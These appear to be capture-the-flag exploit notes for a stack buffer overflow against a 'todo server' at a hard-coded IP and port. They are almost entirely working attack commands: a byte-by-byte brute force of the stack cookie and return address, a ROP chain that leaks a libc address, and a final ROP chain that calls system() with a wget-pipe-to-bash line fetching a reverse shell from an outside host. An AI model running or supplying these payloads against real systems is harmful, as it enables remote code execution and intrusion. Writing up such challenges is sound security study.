1) Painfully leak stack cookie + saved rbp + return address by hand.
   Did this on the todo server to make it more likely to get the full
   read.
for i in {0..256}; do perl -e 'print "A"x8200,"\x00\xcb\x8c\x02\x1b\xfa\x48\x7f","\xb0\x43\x93\x57\xff\x7f\x00\x00","\x15\xce\xd0\x6b\xb9\x7f\x00\x00"'",chr($i)" | nc -v 88.198.89.206 1234 > $i ; done && grep -A 2 8225 *


perl -e 'print "A"x8200,pack("Q<", 0x7f48fa1b028ccb00), pack("Q<", 0x7fff579343b0), pack("Q<", 0x7fb96bd0ce15)' | nc -v 88.198.89.206 1234

binary_base = 0x7fb96bd0c000
close_got = 0x0x7fb96bf0e038
dprintf = 0x7fb96bd0ca20


2) Leak libc address
perl -e 'print "A"x8200,pack("Q<", 0x7f48fa1b028ccb00), pack("Q<", 0x7fff579343b0), pack("Q<", 0x7fb96bd0c000 + 0xec6), "A"x8, pack("Q<", 5), "B"x8, pack("Q<", 0x7fb96bd0c000 + 0x202018), "C"x8, pack("Q<", 0x7fb96bd0c000 + 0x202018), pack("Q<", 4), pack("Q<", 0x7fb96bd0c000 + 0xeb0)' | nc -v 88.198.89.206 1234


 ec6:   48 8b 5c 24 08          mov    0x8(%rsp),%rbx
 ecb:   48 8b 6c 24 10          mov    0x10(%rsp),%rbp
 ed0:   4c 8b 64 24 18          mov    0x18(%rsp),%r12
 ed5:   4c 8b 6c 24 20          mov    0x20(%rsp),%r13
 eda:   4c 8b 74 24 28          mov    0x28(%rsp),%r14
 edf:   4c 8b 7c 24 30          mov    0x30(%rsp),%r15
 ee4:   48 83 c4 38             add    $0x38,%rsp
 ee8:   c3                      retq



 eb0:   4c 89 ea                mov    %r13,%rdx
 eb3:   4c 89 f6                mov    %r14,%rsi
 eb6:   44 89 ff                mov    %r15d,%edi
 eb9:   41 ff 14 dc             callq  *(%r12,%rbx,8)


libc_base = 0x7fb96b71f000
system = 0x7fb96b765320

   2338d:   48 89 df                mov    %rbx,%rdi
   23390:   ff d5                   callq  *%rbp

30a66:   5b                      pop    %rbx
30a67:   5d                      pop    %rbp
30a68:   c3                      retq

   3a9a0:   4c 89 ea                mov    %r13,%rdx
   3a9a3:   48 89 de                mov    %rbx,%rsi
   3a9a6:   48 89 ef                mov    %rbp,%rdi
   3a9a9:   41 ff d4                callq  *%r12

   3b7c1:   5b                      pop    %rbx
   3b7c2:   41 5c                   pop    %r12
   3b7c4:   5d                      pop    %rbp
   3b7c5:   c3                      retq


3) ROP and get a shell
perl -e 'print "wget -O- https://rzhou.org/~ricky/revshell.bash|bash","\x00"x(8200-52),pack("Q<", 0x7f48fa1b028ccb00), pack("Q<", 0x7fff579343b0), pack("Q<", 0x7fb96b71f000 + 0x3b7c1), pack("Q<", 0x7fff579343b0 - 0x70 - 0x2000), pack("Q<", 0x7fb96b765320), pack("Q<", 0x7fff579343b0 - 0x70 - 0x2000), pack("Q<", 0x7fb96b71f000 + 0x3a9a3)' | nc -v 88.198.89.206 1234